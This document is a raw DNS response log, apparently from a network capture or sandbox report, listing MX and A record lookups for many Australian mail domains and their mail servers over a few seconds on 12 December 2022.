                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.121793985 CET8.8.8.8192.168.2.30x3fc7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.121793985 CET8.8.8.8192.168.2.30x3fc7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.121793985 CET8.8.8.8192.168.2.30x3fc7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.145944118 CET8.8.8.8192.168.2.30xaa3dNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.186364889 CET8.8.8.8192.168.2.30xd9d9No error (0)starnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.212162971 CET8.8.8.8192.168.2.30x9486No error (0)cusdomain.iinet.net.au203.0.178.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.289705992 CET8.8.8.8192.168.2.30x1aeeNo error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.324464083 CET8.8.8.8192.168.2.30x96c4No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.334856987 CET8.8.8.8192.168.2.30xe0d7No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.354202986 CET8.8.8.8192.168.2.30x6fe4No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.441813946 CET8.8.8.8192.168.2.30x7ea9No error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.483390093 CET8.8.8.8192.168.2.30x2107No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.483390093 CET8.8.8.8192.168.2.30x2107No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.525005102 CET8.8.8.8192.168.2.30xd7bbNo error (0)hn.ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.567533016 CET8.8.8.8192.168.2.30x4b3bNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.643899918 CET8.8.8.8192.168.2.30x615fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.643899918 CET8.8.8.8192.168.2.30x615fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.643899918 CET8.8.8.8192.168.2.30x615fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.664139986 CET8.8.8.8192.168.2.30x4010No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.738394976 CET8.8.8.8192.168.2.30x50aeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.738394976 CET8.8.8.8192.168.2.30x50aeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.738394976 CET8.8.8.8192.168.2.30x50aeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.758743048 CET8.8.8.8192.168.2.30xdc9eNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.767560959 CET8.8.8.8192.168.2.30x425eNo error (0)fastmail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.767560959 CET8.8.8.8192.168.2.30x425eNo error (0)fastmail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.787249088 CET8.8.8.8192.168.2.30x422bNo error (0)in1-smtp.messagingengine.com66.111.4.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.787249088 CET8.8.8.8192.168.2.30x422bNo error (0)in1-smtp.messagingengine.com66.111.4.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.787249088 CET8.8.8.8192.168.2.30x422bNo error (0)in1-smtp.messagingengine.com66.111.4.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.787249088 CET8.8.8.8192.168.2.30x422bNo error (0)in1-smtp.messagingengine.com66.111.4.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.787249088 CET8.8.8.8192.168.2.30x422bNo error (0)in1-smtp.messagingengine.com66.111.4.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.787249088 CET8.8.8.8192.168.2.30x422bNo error (0)in1-smtp.messagingengine.com66.111.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.821223021 CET8.8.8.8192.168.2.30xfcb8No error (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.840138912 CET8.8.8.8192.168.2.30xfe95No error (0)mail.optusnet.com.au211.29.132.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.959706068 CET8.8.8.8192.168.2.30x9d63No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.040049076 CET8.8.8.8192.168.2.30x762fNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.111309052 CET8.8.8.8192.168.2.30x3c21No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.111309052 CET8.8.8.8192.168.2.30x3c21No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.111309052 CET8.8.8.8192.168.2.30x3c21No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.132441044 CET8.8.8.8192.168.2.30x4ba4No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.229854107 CET8.8.8.8192.168.2.30x5e90No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.235677004 CET8.8.8.8192.168.2.30x61adNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.235677004 CET8.8.8.8192.168.2.30x61adNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.235677004 CET8.8.8.8192.168.2.30x61adNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.274802923 CET8.8.8.8192.168.2.30xbc20No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.274802923 CET8.8.8.8192.168.2.30xbc20No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.289921999 CET8.8.8.8192.168.2.30x88efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.289921999 CET8.8.8.8192.168.2.30x88efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.289921999 CET8.8.8.8192.168.2.30x88efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.310416937 CET8.8.8.8192.168.2.30xc10cNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.368999958 CET8.8.8.8192.168.2.30xd9f3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.368999958 CET8.8.8.8192.168.2.30xd9f3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.368999958 CET8.8.8.8192.168.2.30xd9f3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.391088963 CET8.8.8.8192.168.2.30x23a4No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.475660086 CET8.8.8.8192.168.2.30x3e4fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.475660086 CET8.8.8.8192.168.2.30x3e4fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.475660086 CET8.8.8.8192.168.2.30x3e4fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.496032000 CET8.8.8.8192.168.2.30xb328No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.552484035 CET8.8.8.8192.168.2.30xc265No error (0)asav.tpgtelecom.com.au27.32.28.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.555615902 CET8.8.8.8192.168.2.30xb8a1No error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.555615902 CET8.8.8.8192.168.2.30xb8a1No error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.627825975 CET8.8.8.8192.168.2.30xcef9No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.627825975 CET8.8.8.8192.168.2.30xcef9No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.662746906 CET8.8.8.8192.168.2.30xeca4No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.692653894 CET8.8.8.8192.168.2.30x451No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.713416100 CET8.8.8.8192.168.2.30x57acNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.899234056 CET8.8.8.8192.168.2.30x6000No error (0)alphawest.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:02.899234056 CET8.8.8.8192.168.2.30x6000No error (0)alphawest.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.050120115 CET8.8.8.8192.168.2.30x6b9eNo error (0)boomtick.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.050120115 CET8.8.8.8192.168.2.30x6b9eNo error (0)boomtick.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.079328060 CET8.8.8.8192.168.2.30xbabfNo error (0)boomtick.com.au.inbound.anz.mpmailmx.net52.62.125.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.212202072 CET8.8.8.8192.168.2.30xb602No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.212202072 CET8.8.8.8192.168.2.30xb602No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.212202072 CET8.8.8.8192.168.2.30xb602No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.233277082 CET8.8.8.8192.168.2.30x54c4No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.265714884 CET8.8.8.8192.168.2.30x46d8No error (0)figdor.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.265714884 CET8.8.8.8192.168.2.30x46d8No error (0)figdor.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.265714884 CET8.8.8.8192.168.2.30x46d8No error (0)figdor.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.265714884 CET8.8.8.8192.168.2.30x46d8No error (0)figdor.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.265714884 CET8.8.8.8192.168.2.30x46d8No error (0)figdor.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.292233944 CET8.8.8.8192.168.2.30x73a4No error (0)alt1.aspmx.l.google.com142.250.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.304866076 CET8.8.8.8192.168.2.30xb1aaNo error (0)m-obemv-vic-sun-mta01.alphawest.com.au125.63.146.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.428109884 CET8.8.8.8192.168.2.30x1f2dNo error (0)mlcsyd.nsw.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.437069893 CET8.8.8.8192.168.2.30xc1f4No error (0)studentflights.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.437069893 CET8.8.8.8192.168.2.30xc1f4No error (0)studentflights.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.451066017 CET8.8.8.8192.168.2.30xf296No error (0)iinet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.451066017 CET8.8.8.8192.168.2.30xf296No error (0)iinet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.471118927 CET8.8.8.8192.168.2.30x58d1No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.471118927 CET8.8.8.8192.168.2.30x58d1No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.471118927 CET8.8.8.8192.168.2.30x58d1No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.471118927 CET8.8.8.8192.168.2.30x58d1No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.473723888 CET8.8.8.8192.168.2.30x6ca8No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.580154896 CET8.8.8.8192.168.2.30xb0b0No error (0)mlcsyd-nsw-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.580154896 CET8.8.8.8192.168.2.30xb0b0No error (0)mlcsyd-nsw-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.628859043 CET8.8.8.8192.168.2.30xf78bNo error (0)bpgconsultants.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.679279089 CET8.8.8.8192.168.2.30x50eeNo error (0)bpgconsultants-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.679279089 CET8.8.8.8192.168.2.30x50eeNo error (0)bpgconsultants-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.709186077 CET8.8.8.8192.168.2.30x5db0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.709186077 CET8.8.8.8192.168.2.30x5db0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.709186077 CET8.8.8.8192.168.2.30x5db0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.729713917 CET8.8.8.8192.168.2.30x5749No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
